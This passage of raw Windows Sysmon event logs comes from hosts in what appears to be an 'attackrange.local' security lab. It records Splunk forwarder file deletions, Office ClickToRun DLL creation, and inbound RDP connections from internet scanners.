Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=581642F5027E81901BB16693515FA9A8,SHA256=7D7EDC7886671C2733FA997324F4DDC7735E200F75C224A65B5AD010FD5C16DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064882Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:35.940{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A287459C298294E4508826BED9F2A5D9,SHA256=724DCA2260060BAFE08CA421E3232FABA7683558A0EC38BE132C5D0BA316E3BB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000064881Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:34.451{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57491-false52.109.12.23-443https 354300x800000000000000064880Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:34.359{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53413- 354300x800000000000000064879Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:33.821{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com52985-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064878Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:33.775{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com63781-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000049533Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:35.280{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CBA32C2C15E7E26C2342302B88185CCE,SHA256=0DB075C3A183AA2D8E0FE449131A182E0A21210D78DD06AD7ED35E47F8F8452F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049532Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:35.124{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A223AAC94BC1E3553902C974E66F6E3C,SHA256=F545AA877C55B6C5BF50E16D2E5B07AED026CAFD92A50ACF19FE5BD1A6EDD1C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064884Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:36.971{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=101D141E95419B2409E15ED7B2DB747F,SHA256=F2EF530D203C3E2D00A33D451AD405614D6DF63CC0E61B253EDCCE2C72EF61DE,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000064883Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:35.099{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-40224-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000049534Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:36.140{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E32D6015FFC8F196C899E1A903463F9,SHA256=A8D0B281D0DB218398667BD1F8645C1960F6570D5391B8CE94EE6ED1A9D8E6A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064890Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:37.987{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DC31F9409CDD210835F8D303FC5F815,SHA256=BD38DB6CAB41EA570D3AC9D81FC52ACB7D888EEFE4D5C32C5880D116D6528E13,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000064889Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:36.666{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-47051-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064888Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:36.528{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-49788-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064887Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:35.651{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local58131- 11241100x800000000000000064886Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:37.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\C2R32.dll2021-04-20 14:54:37.268 11241100x800000000000000064885Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:37.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\AppvIsvSubsystems32.dll2021-04-20 14:54:37.252 23542300x800000000000000049537Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:37.970{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=28C6F4E3EA2CFAB523B2FB9C7A7C5F84,SHA256=899C759D2C58630EC8F7A1B8883FB5C6406791B6218E3BF388C931653234C86C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049536Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:37.172{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95CC252F83B6E8EB2E3BFA51E1C6BAF3,SHA256=5F5B689AAED686DB78CA56A1C4261082A238D8AB8079596DB7BD0042C363F4B6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049535Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:34.796{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-63453-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000064891Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:38.627{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=70EF166DC891DAECC209D5AAD851F96A,SHA256=89F19605BCEFFD666557AC3B3DD04991973D7B31FEB847411719DBC953FBDD58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049539Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:38.189{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A01BC13D2EB771BC460F2A76885EC13,SHA256=CB54E25A4FA6169BA55F5CF25C6319BCB5D87F6D6C22E40E55F1CDE80E6EA3BE,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049538Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:36.355{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-64944-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000064894Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:38.276{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57492-false10.0.1.12-8000- 354300x800000000000000064893Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:37.937{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com54607-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000064892Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:39.002{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD16F2142037AAA23536939CFAC155AD,SHA256=999FD177E70C7F931F92D87254CD17A7CAD80C45EC0100E11D734CD1D34D5A01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049540Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:39.222{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70552F15C0FF0006561A6AB8A8F9F0B3,SHA256=B0466D0038A0F532A2E4AFC9ED82C90399FAAC6EC2EBB5B21A7001279EB33AD7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000064897Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:39.499{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52518-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064896Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:39.430{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-44320-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000064895Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:40.018{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF997D544945206764F79E0042753C62,SHA256=5094073FDCAD4E0E365319B22612071DEEE7E74086E9B8B95582EA6BE771878B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049543Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:40.254{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D53F2A1993007900BCF20B4F613064D,SHA256=ACF7F04442797E8BD5CECA8DC39A3873CCDE815FAFFAF618857EA87A0061EEA2,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049542Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:37.704{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52489-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049541Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:36.820{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com53208-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000064899Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:41.533{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=01988320408F2076801B14A5B809B22F,SHA256=221944CF571C07DF8D6273AE531BB7BD9A355250C630A98297113C48DB02979B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064898Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:41.033{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD195F2E08D5AB8060F0C546A66E7E51,SHA256=F16044996A221F21F3FE066168485DC4EC4A99DB3F507809621C1C5A43196E2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049545Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:41.504{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C581424B50BB87DBD772CE04E11704A3,SHA256=0222BA9301C4F272F3518A1479EDCDA99AAB5DFE5E3DD15A709C7463E603E127,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049544Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:41.285{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10BC0DFAD82193D534302AA1E966B1C3,SHA256=23C0546821C08CAB3760BE7EAC0306E4C35B7930373888877B6277E848B1BBB4,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000064905Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:41.535{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com57168-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064904Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:41.091{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51153-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064903Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:41.082{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com63503-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064902Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:41.057{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53883-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000064901Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:42.705{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EA57867A82ED7C388075A14CD63ADB89,SHA256=E99C478A1F2DE97C3E720DFDE7ABF2FA5DD85B382A383C50DFB40A8BF9250FA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064900Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:42.033{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5A2A391B03D6BB5D694A12EBADB8EE7,SHA256=620FFA8A59A4095CCD961F3061B01474E873908A53E378E47F489A8700706FEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049547Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:42.301{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A122C3B1C1753F82B9703873EDA54613,SHA256=1837B38BFCF967BF9186664E0AB077C720285714149E1E920AFB566A16843D3F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049546Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:39.904{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com60811-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000064908Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:43.815{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B583FCF7E0C4E078558337F89BE6E798,SHA256=9E393F5578F57BB8C27DB7C998A1C86E02238B3352CF17526717CD16FEF9B8F8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000064907Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:42.477{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-55248-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000064906Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:43.080{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E69B1C97DC08DA77CEBC2D084156A6A,SHA256=E841D3875D403F26F2FF87D35E398AEC18917846704F226516BD31A117527880,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049552Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:43.676{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=590C9BF8A0A6B693554084376721667B,SHA256=E9F0BFCCBE9C2A26B41F58CB61A9AEEBED96A398FD04F8B4B72DF05694EB6E2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049551Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:43.301{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A340B72C52D0782AE0FD1721FBF741E,SHA256=5275353A147BE88B486D7AA1810FB9BA799D0B0D480384DCC5F0E0802507220A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049550Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:41.062{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53024-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049549Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:40.930{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50050-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049548Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:40.585{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-60494-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000064909Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:44.096{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD13914CF7672BECEDFB7D299FB12105,SHA256=64CCB0406B7F8B6C50A313112FB251D8E6EE698322A680F56ACD786F708010D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049554Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:44.722{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1F069BB52EBE247621DB8BD9A7DBF74A,SHA256=85B76F0FE136ADBAD2476881A1B522116CB0728E8ACDC3AF05AE79129C9BBC2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049553Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:44.316{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE30619B0402E4625F2815ED99410AA5,SHA256=7B9FE2B411656CDF47B8F9CDB65157C0267ABF6D21231E6B9BDD5FB9373E0E58,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000064912Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:44.104{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-48415-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064911Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:44.073{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57493-false10.0.1.12-8000- 23542300x800000000000000064910Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:45.111{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10E398145514425649547CD5146ACE9A,SHA256=3911F5B6F5BB71CE2A2513324B61CBC41AA8B404DD5A272305DFF5C564BA8F82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049558Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:45.379{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A1BAC98DB9AC704D0CEE71A70E0C408,SHA256=E233BD9E66909936E2083D375D346D7B8169BF87D5F63D6362B90DEEDFBFE1D6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049557Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:42.706{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52490-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049556Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:42.692{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54508-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049555Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:42.624{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 